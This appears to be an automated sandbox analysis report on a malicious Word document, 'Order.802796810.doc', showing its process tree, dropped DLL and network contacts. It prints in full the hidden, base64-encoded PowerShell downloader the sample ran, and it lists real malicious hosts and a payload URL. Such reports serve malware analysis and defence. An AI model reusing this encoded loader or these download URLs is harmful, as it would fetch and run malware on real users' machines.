Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 339433 Sample: Order.802796810.doc Startdate: 14/01/2021 Architecture: WINDOWS Score: 100 28 Found malware configuration 2->28 30 Antivirus detection for URL or domain 2->30 32 Multi AV Scanner detection for dropped file 2->32 34 11 other signatures 2->34 8 cmd.exe 2->8         started        11 WINWORD.EXE 293 27 2->11         started        process3 signatures4 36 Suspicious powershell command line found 8->36 38 Very long command line found 8->38 40 Encrypted powershell cmdline option found 8->40 13 powershell.exe 12 9 8->13         started        18 msg.exe 8->18         started        process5 dnsIp6 26 mail.kyojinconduits.com 198.54.126.36, 49167, 80 NAMECHEAP-NETUS United States 13->26 24 C:\Users\user\Lx8o0szbehaviorgraphztazkl\I11F.dll, PE32 13->24 dropped 42 Powershell drops PE file 13->42 20 rundll32.exe 13->20         started        file7 signatures8 process9 process10 22 rundll32.exe 20->22         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.54.126.36
unknown United States
22612 NAMECHEAP-NETUS true

Contacted Domains

Name IP Active
mail.kyojinconduits.com 198.54.126.36 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://mail.kyojinconduits.com/jhgun753.zip true
  • Avira URL Cloud: malware
unknown